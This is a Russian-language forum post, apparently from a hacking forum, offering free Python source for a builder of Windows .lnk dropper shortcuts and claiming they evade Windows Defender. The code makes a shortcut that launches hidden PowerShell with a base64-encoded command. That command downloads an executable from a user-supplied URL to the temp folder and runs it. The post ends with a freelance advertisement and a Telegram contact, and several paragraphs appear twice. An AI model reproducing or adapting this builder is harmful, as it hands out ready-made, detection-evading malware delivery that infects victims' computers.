Доборого, посетители темы. Недавно один пользователь создал тему о поиске лоадера/дроппера без детектов от Windows Defender, но позже решил использовать .lnk дропперы. Я бесплатно предоставил ему решение, написанное за пять минут, но оказалось, что билдер .lnk дропперов интересен многим, поэтому хочу выложить исходный код на Python, который позволяет вам создавать .lnk дропперы в неограниченном количестве и абсолютно бесплатно
Технические моменты: ярлык отзывается к powershell 1.0, который есть на всех версиях Windows, начиная с 7; команда в ярлыке зашифрована официльным методом от Microsoft: command > utf-16le > base64
На момент создания данной темы детектов от Windows Defender нет, и скорее всего, никогда не будет, но этого гарантировать я не могу
Для того, чтобы python код работал корректно необходимо установить библиотеку pywin32:
Раз уж есть возможность, то хочу написать о том, что я свободный разработчик, готовый взять любую работу по разработке/поддержке каких либо идей и проектов. Знаю несколько языков программирования: C++, C#, nodejs, php и python
Связаться со мной можно через личные сообщения на форуме, либо через телеграм — https://t.me/zerodebug
Технические моменты: ярлык отзывается к powershell 1.0, который есть на всех версиях Windows, начиная с 7; команда в ярлыке зашифрована официльным методом от Microsoft: command > utf-16le > base64
На момент создания данной темы детектов от Windows Defender нет, и скорее всего, никогда не будет, но этого гарантировать я не могу
Для того, чтобы python код работал корректно необходимо установить библиотеку pywin32:
pip install pywin32
Python:
#* Код для генерации .lnk ярлыков, написанный пользователем audi
#* https://xss.pro/members/380180/ — Telegram: @zerodebug
import os
import base64
import win32com.client
import uuid
def create_shortcut(target, arguments, lnkpathkudasohranit):
shell = win32com.client.Dispatch("WScript.Shell")
shortcut = shell.CreateShortCut(lnkpathkudasohranit)
shortcut.TargetPath = target
shortcut.Arguments = arguments
shortcut.save()
def main():
file_url = input("Введите ссылку на файл: ")
unique_filename = f"{uuid.uuid4()}.exe"
command = f"Invoke-WebRequest -Uri \"{file_url}\" -OutFile \"$env:TEMP\\{unique_filename}\"; Start-Process \"$env:TEMP\\{unique_filename}\""
encoded_command = base64.b64encode(command.encode('utf-16le')).decode('utf-8')
powershellkomanda = f"-WindowStyle Hidden -Command \"[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('{encoded_command}')) | Invoke-Expression\""
lnknazvanie = f"audi_{uuid.uuid4()}.lnk"
lnkpathkudasohranit = os.path.join(os.path.expanduser("~"), "Desktop", lnknazvanie)
create_shortcut(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", powershellkomanda, lnkpathkudasohranit)
print(f"Ярлык с пейлоадом сохранен сюда: {lnkpathkudasohranit}")
if __name__ == "__main__":
main()
Раз уж есть возможность, то хочу написать о том, что я свободный разработчик, готовый взять любую работу по разработке/поддержке каких либо идей и проектов. Знаю несколько языков программирования: C++, C#, nodejs, php и python
Связаться со мной можно через личные сообщения на форуме, либо через телеграм — https://t.me/zerodebug